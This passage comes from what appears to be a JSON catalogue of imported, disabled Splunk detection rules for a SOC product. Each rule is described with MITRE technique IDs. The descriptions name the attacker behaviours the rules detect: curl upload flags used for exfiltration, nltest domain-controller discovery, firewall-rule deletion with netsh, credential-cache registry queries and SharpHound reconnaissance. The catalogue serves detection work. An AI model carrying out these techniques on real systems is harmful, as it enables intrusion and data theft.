the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3fb2e8e3-7bc0-4567-9722-c5ab9f8595eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_create_local_account.yml" } }, { "id": "splunk-security-content-3fc16961-97e5-4a5b-a079-e4ab0d9763eb", "type": "detection", "name": "Windows PowerShell Add Module to Global Assembly Cache", "description": "The following analytic detects the addition of a DLL to the Windows Global Assembly Cache (GAC) using PowerShell. It leverages PowerShell Script Block Logging to identify commands containing \"system.enterpriseservices.internal.publish\". This activity is significant because adding a DLL to the GAC allows it to be shared across multiple applications, potentially enabling an adversary to execute malicious code system-wide. If confirmed malicious, this could lead to widespread code execution, privilege escalation, and persistent access across the operating system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-add-module-to-global-assembly-cache.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3fc16961-97e5-4a5b-a079-e4ab0d9763eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_add_module_to_global_assembly_cache.yml" } }, { "id": "splunk-security-content-4006adac-5937-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious MSBuild Rename", "description": "The following analytic detects the execution of renamed instances of msbuild.exe. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names within the Endpoint data model. This activity is significant because msbuild.exe is a legitimate tool often abused by attackers to execute malicious code while evading detection. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-msbuild-rename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4006adac-5937-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_msbuild_rename.yml" } }, { "id": "splunk-security-content-404620de-46d8-48b6-90cc-8a8d7b0876a3", "type": "detection", "name": "Shim Database Installation With Suspicious Parameters", "description": "The following analytic detects the execution of sdbinst.exe with parameters indicative of silently creating a shim database. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line arguments. This activity is significant because shim databases can be used to intercept and manipulate API calls, potentially allowing attackers to bypass security controls or achieve persistence. If confirmed malicious, this could enable unauthorized code execution, privilege escalation, or persistent access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/shim-database-installation-with-suspicious-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "404620de-46d8-48b6-90cc-8a8d7b0876a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/shim_database_installation_with_suspicious_parameters.yml" } }, { "id": "splunk-security-content-4057291a-b8cf-11eb-95fe-acde48001122", "type": "detection", "name": "Detect Renamed 7-Zip", "description": "The following analytic detects the usage of a renamed 7-Zip executable using Sysmon data. It leverages the OriginalFileName field to identify instances where the 7-Zip process has been renamed. This activity is significant as attackers often rename legitimate tools to evade detection while staging or exfiltrating data. If confirmed malicious, this behavior could indicate data exfiltration attempts or other unauthorized data manipulation, potentially leading to significant data breaches or loss of sensitive information. Analysts should validate the legitimacy of the 7-Zip executable and investigate parallel processes for further suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-renamed-7-zip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4057291a-b8cf-11eb-95fe-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_renamed_7_zip.yml" } }, { "id": "splunk-security-content-406c21d6-6c75-4e9f-9ca9-48049a1dd90e", "type": "detection", "name": "Windows Input Capture Using Credential UI Dll", "description": "The following analytic detects a process loading the credui.dll or wincredui.dll module. This detection leverages Sysmon EventCode 7 to identify instances where these DLLs are loaded by processes outside typical system directories. This activity is significant because adversaries often abuse these modules to create fake credential prompts or dump credentials, posing a risk of credential theft. If confirmed malicious, this activity could allow attackers to harvest user credentials, leading to unauthorized access and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-input-capture-using-credential-ui-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "406c21d6-6c75-4e9f-9ca9-48049a1dd90e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_input_capture_using_credential_ui_dll.yml" } }, { "id": "splunk-security-content-40925f12-4709-11ec-bb43-acde48001122", "type": "detection", "name": "High Frequency Copy Of Files In Network Share", "description": "The following analytic detects a high frequency of file copying or moving within network shares, which may indicate potential data sabotage or exfiltration attempts. It leverages Windows Security Event Logs (EventCode 5145) to monitor access to specific file types and network shares. This activity is significant as it can reveal insider threats attempting to transfer classified or internal files, potentially leading to data breaches or evidence tampering. If confirmed malicious, this behavior could result in unauthorized data access, data loss, or compromised sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/high-frequency-copy-of-files-in-network-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40925f12-4709-11ec-bb43-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/high_frequency_copy_of_files_in_network_share.yml" } }, { "id": "splunk-security-content-40a064c1-4ec1-4381-9e35-61192ba8ef82", "type": "detection", "name": "Kubernetes Abuse of Secret by Unusual Location", "description": "The following analytic detects unauthorized access or misuse of Kubernetes Secrets from unusual locations. It leverages Kubernetes Audit logs to identify anomalies in access patterns by analyzing the source of requests by country. This activity is significant for a SOC as Kubernetes Secrets store sensitive information like passwords, OAuth tokens, and SSH keys, making them critical assets. If confirmed malicious, this behavior could indicate an attacker attempting to exfiltrate or misuse these secrets, potentially leading to unauthorized access to sensitive systems or data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-abuse-of-secret-by-unusual-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40a064c1-4ec1-4381-9e35-61192ba8ef82", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_abuse_of_secret_by_unusual_location.yml" } }, { "id": "splunk-security-content-40bb64f9-f619-4e3d-8732-328d40377c4b", "type": "detection", "name": "MacOS - Re-opened Applications", "description": "The following analytic identifies processes referencing plist files that determine which applications are re-opened when a user reboots their MacOS machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent processes related to \"com.apple.loginwindow.\" This activity is significant because it can indicate attempts to persist across reboots, a common tactic used by attackers to maintain access. If confirmed malicious, this could allow an attacker to execute code or maintain persistence on the affected system, potentially leading to further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/macos-re-opened-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40bb64f9-f619-4e3d-8732-328d40377c4b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos___re_opened_applications.yml" } }, { "id": "splunk-security-content-40c2ba5b-dd6a-496b-9e6e-c9524d0be167", "type": "detection", "name": "Windows IIS Components Module Failed to Load", "description": "The following analytic detects when an IIS Module DLL fails to load due to a configuration problem, identified by EventCode 2282. This detection leverages Windows Application event logs to identify repeated failures in loading IIS modules. Such failures can indicate misconfigurations or potential tampering with IIS components. If confirmed malicious, this activity could lead to service disruptions or provide an attacker with opportunities to exploit vulnerabilities within the IIS environment. Immediate investigation is required to determine the legitimacy of the failing module and to mitigate any potential security risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-components-module-failed-to-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40c2ba5b-dd6a-496b-9e6e-c9524d0be167", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iis_components_module_failed_to_load.yml" } }, { "id": "splunk-security-content-40ccb8e0-1785-466e-901e-6a8b75c04ecd", "type": "detection", "name": "Windows Cached Domain Credentials Reg Query", "description": "The following analytic identifies a process command line querying the CachedLogonsCount registry value in the Winlogon registry. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and registry queries. Monitoring this activity is significant as it can indicate the use of post-exploitation tools like Winpeas, which gather information about login caching settings. If confirmed malicious, this activity could help attackers understand login caching configurations, potentially aiding in credential theft or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cached-domain-credentials-reg-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40ccb8e0-1785-466e-901e-6a8b75c04ecd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cached_domain_credentials_reg_query.yml" } }, { "id": "splunk-security-content-40d2dc41-9bbf-421a-a34b-8611271a6770", "type": "detection", "name": "Internal Vertical Port Scan", "description": "This analytic detects instances where an internal host attempts to communicate with over 500 ports on a single destination IP address. It includes filtering criteria to exclude applications performing scans over ephemeral port ranges, focusing on potential reconnaissance or scanning activities. Monitoring network traffic logs allows for timely detection and response to such behavior, enhancing network security by identifying and mitigating potential threats promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/internal-vertical-port-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40d2dc41-9bbf-421a-a34b-8611271a6770", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/internal_vertical_port_scan.yml" } }, { "id": "splunk-security-content-40e17d88-87da-414e-b253-8dc1e4f9555b", "type": "detection", "name": "GCP Successful Single-Factor Authentication", "description": "The following analytic identifies a successful single-factor authentication event against Google Cloud Platform (GCP) for an account without Multi-Factor Authentication (MFA) enabled. It uses Google Workspace login event data to detect instances where MFA is not utilized. This activity is significant as it may indicate a misconfiguration, policy violation, or potential account takeover attempt. If confirmed malicious, an attacker could gain unauthorized access to GCP resources, potentially leading to data breaches, service disruptions, or further exploitation within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-successful-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40e17d88-87da-414e-b253-8dc1e4f9555b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_successful_single_factor_authentication.yml" } }, { "id": "splunk-security-content-40e3b299-19a5-4460-96e9-e1467f714f8e", "type": "detection", "name": "PowerShell Enable PowerShell Remoting", "description": "The following analytic detects the use of the Enable-PSRemoting cmdlet, which allows PowerShell remoting on a local or remote computer. This detection leverages PowerShell Script Block Logging (EventCode 4104) to identify when this cmdlet is executed. Monitoring this activity is crucial as it can indicate an attacker enabling remote command execution capabilities on a compromised system. If confirmed malicious, this activity could allow an attacker to take control of the system remotely, execute commands, and potentially pivot to other systems within the network, leading to further compromise and lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-enable-powershell-remoting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40e3b299-19a5-4460-96e9-e1467f714f8e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_enable_powershell_remoting.yml" } }, { "id": "splunk-security-content-41243735-89a7-4c83-bcdd-570aa78f00a1", "type": "detection", "name": "Domain Controller Discovery with Nltest", "description": "The following analytic detects the execution of `nltest.exe` with command-line arguments `/dclist:` or `/dsgetdc:` to discover domain controllers. It leverages Endpoint Detection and Response (EDR) data, focusing on process names and command-line arguments. This activity is significant because both Red Teams and adversaries use `nltest.exe` for situational awareness and Active Directory discovery. If confirmed malicious, this behavior could allow attackers to map out domain controllers, facilitating further attacks such as privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-controller-discovery-with-nltest.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "41243735-89a7-4c83-bcdd-570aa78f00a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_controller_discovery_with_nltest.yml" } }, { "id": "splunk-security-content-41a0e58e-884c-11ec-9976-acde48001122", "type": "detection", "name": "Windows Schtasks Create Run As System", "description": "The following analytic detects the creation of a new scheduled task using Schtasks.exe to run as the SYSTEM user. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it often indicates an attempt to gain elevated privileges or maintain persistence within the environment. If confirmed malicious, an attacker could execute code with SYSTEM-level privileges, potentially leading to data theft, ransomware deployment, or further system compromise. Immediate investigation and mitigation are crucial to prevent further damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-schtasks-create-run-as-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "41a0e58e-884c-11ec-9976-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_schtasks_create_run_as_system.yml" } }, { "id": "splunk-security-content-41bbb371-28ba-439c-bb5c-d9930c28365d", "type": "detection", "name": "Windows AD Cross Domain SID History Addition", "description": "The following analytic detects changes to the sIDHistory attribute of user or computer objects across different domains. It leverages Windows Security Event Codes 4738 and 4742 to identify when the sIDHistory attribute is modified. This activity is significant because the sIDHistory attribute allows users to inherit permissions from other AD accounts, which can be exploited by adversaries for inter-domain privilege escalation and persistence. If confirmed malicious, this could enable attackers to gain unauthorized access to resources, maintain persistence, and escalate privileges across domain boundaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-cross-domain-sid-history-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "41bbb371-28ba-439c-bb5c-d9930c28365d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_cross_domain_sid_history_addition.yml" } }, { "id": "splunk-security-content-41c61539-98ca-4750-b3ec-7c29a2f06343", "type": "detection", "name": "Windows Modify Registry Delete Firewall Rules", "description": "The following analytic detects a potential deletion of firewall rules, indicating a possible security breach or unauthorized access attempt. It identifies actions where firewall rules are removed using commands like netsh advfirewall firewall delete rule, which can expose the network to external threats by disabling critical security measures. Monitoring these activities helps maintain network integrity and prevent malicious attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-delete-firewall-rules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "41c61539-98ca-4750-b3ec-7c29a2f06343", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_delete_firewall_rules.yml" } }, { "id": "splunk-security-content-425a6657-c5e4-4cbb-909e-fc9e5d326f01", "type": "detection", "name": "Windows Defender ASR Rules Stacking", "description": "The following analytic identifies security events from Microsoft Defender, focusing on Exploit Guard and Attack Surface Reduction (ASR) features. It detects Event IDs 1121, 1126, 1131, and 1133 for blocked operations, and Event IDs 1122, 1125, 1132, and 1134 for audit logs. Event ID 1129 indicates user overrides, while Event ID 5007 signals configuration changes. This detection uses a lookup to correlate ASR rule GUIDs with descriptive names. Monitoring these events is crucial for identifying unauthorized operations, potential security breaches, and policy enforcement issues. If confirmed malicious, attackers could bypass security measures, execute unauthorized actions, or alter system configurations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-rules-stacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "425a6657-c5e4-4cbb-909e-fc9e5d326f01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_rules_stacking.yml" } }, { "id": "splunk-security-content-429141be-8311-11eb-adb6-acde48001122", "type": "detection", "name": "Windows Service Created with Suspicious Service Path", "description": "The following analytic detects the creation of a Windows Service with a binary path located in uncommon directories, using Windows Event ID 7045. It leverages logs from the `wineventlog_system` to identify services installed outside typical system directories. This activity is significant as adversaries, including those deploying Clop ransomware, often create malicious services for lateral movement, remote code execution, persistence, and execution. If confirmed malicious, this could allow attackers to maintain persistence, execute arbitrary code, and potentially escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-created-with-suspicious-service-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "429141be-8311-11eb-adb6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_created_with_suspicious_service_path.yml" } }, { "id": "splunk-security-content-429d611b-3183-49a7-b235-fc4203c4e1cb", "type": "detection", "name": "Windows Defender ASR Rule Disabled", "description": "The following analytic identifies when a Windows Defender ASR rule disabled events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR rule disabled events that are generated when an ASR rule is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-rule-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "429d611b-3183-49a7-b235-fc4203c4e1cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_rule_disabled.yml" } }, { "id": "splunk-security-content-42b3b753-5925-49c5-9742-36fa40a73990", "type": "detection", "name": "Detect Traffic Mirroring", "description": "The following analytic detects the initiation of traffic mirroring sessions on Cisco network devices. It leverages logs with specific mnemonics and facilities related to traffic mirroring, such as \"ETH_SPAN_SESSION_UP\" and \"PKTCAP_START.\" This activity is significant because adversaries may use traffic mirroring to exfiltrate data by duplicating and forwarding network traffic to an external destination. If confirmed malicious, this could allow attackers to capture sensitive information, monitor network communications, and potentially compromise the integrity and confidentiality of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020.001", "T1200", "T1498" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-traffic-mirroring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "42b3b753-5925-49c5-9742-36fa40a73990", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_traffic_mirroring.yml" } }, { "id": "splunk-security-content-42b4b438-beed-11eb-ba1d-acde48001122", "type": "detection", "name": "Detect SharpHound File Modifications", "description": "The following analytic detects the creation of files typically associated with SharpHound, a reconnaissance tool used for gathering domain and trust data. It leverages file modification events from the Endpoint.Filesystem data model, focusing on default file naming patterns like `*_BloodHound.zip` and various JSON files. This activity is significant as it indicates potential domain enumeration, which is a precursor to more targeted attacks. If confirmed malicious, an attacker could gain detailed insights into the domain structure, facilitating lateral movement and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-sharphound-file-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "42b4b438-beed-11eb-ba1d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_sharphound_file_modifications.yml" } }, { "id": "splunk-security-content-42f8f1a2-4228-11ec-aade-acde48001122", "type": "detection", "name": "Windows Curl Upload to Remote Destination", "description": "The following analytic detects the use of Windows Curl.exe to upload a file to a remote destination. It identifies command-line arguments such as `-T`, `--upload-file`, `-d`, `--data`, and `-F` in process execution logs. This activity is significant because adversaries may use Curl to exfiltrate data or upload malicious payloads. If confirmed malicious, this could lead to data breaches or further compromise of the system. Analysts should review parallel processes and network logs to determine if the upload was successful and isolate the endpoint if necessary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-curl-upload-to-remote-destination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "42f8f1a2-4228-11ec-aade-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_curl_upload_to_remote_destination.yml" } }, { "id": "splunk-security-content-43254751-e2ce-409a-b6b4-4f851e8dcc26", "type": "detection", "name": "Windows Modify Registry to Add or Modify Firewall Rule", "description": "The following analytic detects a potential addition or modification of firewall rules, signaling possible configuration changes or security policy adjustments. It tracks commands such as netsh advfirewall firewall add rule and netsh advfirewall firewall set rule, which may indicate attempts to alter network access controls. Monitoring these actions ensures the integrity of firewall settings and helps prevent unauthorized network access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-to-add-or-modify-firewall-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "43254751-e2ce-409a-b6b4-4f851e8dcc26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_to_add_or_modify_firewall_rule.yml" } }, { "id": "splunk-security-content-435c6b33-adf9-47fe-be87-8e29fd6654f5", "type": "detection", "name": "Linux Impair Defenses Process Kill", "description": "The following analytic identifies the execution of the 'pkill' command, which is used to terminate processes on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and 